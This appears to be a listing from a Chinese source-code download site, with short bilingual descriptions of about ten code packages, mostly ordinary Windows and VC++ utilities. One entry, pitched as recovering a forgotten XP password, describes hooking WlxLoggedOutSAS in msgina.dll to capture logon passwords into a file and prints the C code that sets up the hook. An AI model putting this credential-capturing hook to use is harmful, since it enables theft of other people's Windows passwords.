-
Effectively deal with images, and to achieve a variety of different effects can...
有效地对图像进行处理,并能实现各种不同的效果,可以在其基础上增加功能.-Effectively deal with images, and to achieve a variety of different effects can be based on the increase in its functionality.
- 2022-12-17 02:55:03下载
- 积分:1
-
高精度定时器,精度为毫秒,基于VC++开发的一个定时器,可用于高精度定时以及其他...
高精度定时器,精度为毫秒,基于VC++开发的一个定时器,可用于高精度定时以及其他-High-precision timer, an accuracy of milliseconds, based on the VC++ Developed a timer, can be used for high precision timing, as well as other
- 2022-05-10 21:19:13下载
- 积分:1
-
vb6.0报表控件 6.0中,动态报表很难实现,此程序帮你解决了此类问题...
vb6.0报表控件 6.0中,动态报表很难实现,此程序帮你解决了此类问题-vb6.0 statements Control 6.0, dynamic statements difficult to realize that this procedure will help you solve this kind of problem
- 2022-06-13 11:14:52下载
- 积分:1
-
tzuoahfjasjklgjdsjdskljfklsdajjsdklafjkla
拓展培训网站,有助于虚席开发,好好学习条天向上-tzuoahfjasjklgjdsjdskljfklsdajjsdklafjkla
- 2022-08-17 08:09:13下载
- 积分:1
-
关于嵌入式wince电源管理的,详细,属于嵌入式入门必读
关于嵌入式wince电源管理的,详细,属于嵌入式入门必读-Wince on the embedded power management, and detailed, are embedded entry reading
- 2022-02-25 11:26:37下载
- 积分:1
-
BARCODE example......
FULL version via e
BARCODE example......
FULL version via e-mail.
- 2023-02-26 17:55:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
VC++程序员编程教程,很好的电子书籍,chm格式,有很多实例
VC++程序员编程教程,很好的电子书籍,chm格式,有很多实例-VC++ Programmer programming tutorial, very good e-books, chm format, there are many examples of
- 2022-02-10 00:36:41下载
- 积分:1
-
按装程序的实现好看的哦
按装程序的实现好看的哦-procedures installed by the realization pretty oh
- 2022-07-11 14:05:20下载
- 积分:1
-
一个超快搜索的算法源码.
searchi = search ignore case
search = search case sensitive
s...
一个超快搜索的算法源码.
searchi = search ignore case
search = search case sensitive
searchiw = search ignore case words only (e.g. words delimited by whitespace only,not words within words)
searchw() = search case sensitive words only-An ultra-fast search algorithm source code. Searchi = search ignore casesearch = search case sensitivesearchiw = search ignore case words only (eg words delimited by whitespace only, not words within words) searchw () = search case sensitive words only
- 2022-02-03 09:46:23下载
- 积分:1